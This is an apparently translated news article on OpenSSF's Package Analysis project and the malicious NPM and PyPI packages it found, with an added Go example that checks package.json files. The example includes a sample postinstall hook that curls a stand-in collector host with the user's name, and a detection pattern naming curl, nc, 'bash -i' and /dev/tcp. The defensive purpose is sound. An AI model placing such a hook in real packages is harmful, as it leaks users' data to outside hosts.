Analyzer published, revealing 200 malicious packages in NPM and PyPI

The OpenSSF (Open Source Security Foundation), formed by the Linux Foundation to improve the security of open source software, has presented an open project called Package Analysis, which develops a system for detecting malicious code in packages. The project code is written in Go and distributed under the Apache 2.0 license. A preliminary scan of the NPM and PyPI repositories with the proposed toolkit revealed more than 200 previously undetected malicious packages.

Most of the identified problematic packages exploit name collisions with internal, non-public project dependencies (a dependency confusion attack) or use typosquatting (names that resemble those of popular libraries), and also run scripts during installation that contact external hosts. According to the Package Analysis developers, most of the identified packages were most likely created by security researchers taking part in bug bounty programs, since the data sent is limited to the user and system name, and the actions are performed openly, with no attempt to hide the behavior.

Of the packages with malicious activity, the following are noted:

  • The PyPI package discordcmd, which was caught sending atypical requests to raw.githubusercontent.com, the Discord API and ipinfo.io. The package downloaded backdoor code from GitHub and installed it into the Windows Discord client directory, after which it began searching the file system for Discord tokens and sending them to an external Discord server controlled by the attackers.
  • The NPM package colorsss, which also tried to send Discord account tokens to an external server.
  • The NPM package @roku-web-core/ajax, which during installation sent system information and launched a reverse shell handler that accepts external connections and runs commands.
  • The PyPI package secrevthree, which launched a reverse shell when a specific module was imported.
  • The NPM package random-vouchercode-generator, which after the library was imported sent a request to an external server that returned a command and the time at which it was to be run.

Package Analysis works by examining package source code for code that establishes network connections, accesses files, and runs commands. Additionally, changes in the state of packages are monitored to detect malicious insertions into one of the releases of initially harmless software. To track the appearance of new packages in repositories and changes to previously published packages, the Package Feeds toolkit is used, which unifies work with the NPM, PyPI, Go, RubyGems, Packagist, NuGet and Crate repositories.
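As an added illustration of the static side of such a check (example code written for this article, not code from the Package Analysis project), the Go program below inspects an NPM package.json for the three indicators described above: install-time lifecycle scripts that contact external hosts or open a shell, a name within a small edit distance of a popular package (typosquatting), and a name colliding with a list of internal dependencies (dependency confusion). The package name "lodahs", the popular and internal name lists, the collector hostname and the command patterns are all constructed for the example and are not findings from the OpenSSF scan.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// Finding is one observation produced by the manifest check.
type Finding struct {
	Kind   string // install-script, network, typosquat or dependency-confusion
	Detail string
}

// manifest holds the package.json fields this example inspects.
type manifest struct {
	Name    string            `json:"name"`
	Scripts map[string]string `json:"scripts"`
}

// Lifecycle hooks that npm runs automatically while installing a package.
var installHooks = []string{"preinstall", "install", "postinstall", "prepare"}

// Command fragments that reach out to an external host or spawn a shell.
// Constructed for this example; Package Analysis uses its own rules.
var networkCmd = regexp.MustCompile(
	`(?:^|[\s;&|(])(?:curl|wget|nc|ncat)\b|bash -i|/dev/tcp/|https?://`)

// SampleManifest is a constructed package.json: a name two edits away from
// "lodash" plus a postinstall hook that beacons to a made-up host.
const SampleManifest = `{
  "name": "lodahs",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s https://collector.example.invalid/?u=$(whoami)",
    "test": "echo ok"
  }
}`

// levenshtein returns the edit distance between a and b (two-row DP).
func levenshtein(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	prev := make([]int, len(rb)+1)
	cur := make([]int, len(rb)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(ra); i++ {
		cur[0] = i
		for j := 1; j <= len(rb); j++ {
			cost := 1
			if ra[i-1] == rb[j-1] {
				cost = 0
			}
			cur[j] = minInt(prev[j]+1, cur[j-1]+1, prev[j-1]+cost)
		}
		prev, cur = cur, prev
	}
	return prev[len(rb)]
}

func minInt(a, b, c int) int {
	m := a
	if b < m {
		m = b
	}
	if c < m {
		m = c
	}
	return m
}

// AnalyzeManifest parses a package.json and reports install-time scripts,
// network-reaching commands inside them, near-matches of popular names and
// exact collisions with internal (non-public) dependency names.
func AnalyzeManifest(raw []byte, popular, internal []string) ([]Finding, error) {
	var m manifest
	if err := json.Unmarshal(raw, &m); err != nil {
		return nil, fmt.Errorf("parse package.json: %w", err)
	}
	var out []Finding
	for _, hook := range installHooks {
		cmd, ok := m.Scripts[hook]
		if !ok {
			continue
		}
		out = append(out, Finding{"install-script", hook + ": " + cmd})
		if networkCmd.MatchString(cmd) {
			out = append(out, Finding{"network", hook + " contacts an external host or opens a shell"})
		}
	}
	for _, p := range popular {
		if d := levenshtein(m.Name, p); d > 0 && d <= 2 {
			out = append(out, Finding{"typosquat", fmt.Sprintf("%q is %d edit(s) from %q", m.Name, d, p)})
		}
	}
	for _, name := range internal {
		if strings.EqualFold(m.Name, name) {
			out = append(out, Finding{"dependency-confusion", fmt.Sprintf("%q matches an internal dependency name", m.Name)})
		}
	}
	return out, nil
}

// HasKind reports whether any finding has the given kind.
func HasKind(fs []Finding, kind string) bool {
	for _, f := range fs {
		if f.Kind == kind {
			return true
		}
	}
	return false
}

func main() {
	findings, err := AnalyzeManifest([]byte(SampleManifest),
		[]string{"lodash", "chalk", "express"}, []string{"acme-internal-auth"})
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("[%s] %s\n", f.Kind, f.Detail)
	}
}
```

A manifest check like this is only the cheap first pass: it catches the openly declared install hooks that the article says most of the 200 packages used, but not code that runs on import, which is why Package Analysis pairs static inspection with dynamic tracing in a sandbox.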

Package Analysis consists of three basic components that can be used together or separately:

  • A scheduler that launches package analysis jobs based on data from Package Feeds.
  • An analyzer that directly examines a package and evaluates its behavior using static analysis and dynamic tracing. The check is performed in an isolated environment.
  • An uploader that stores the results of the check in BigQuery.

Source: opennet.ru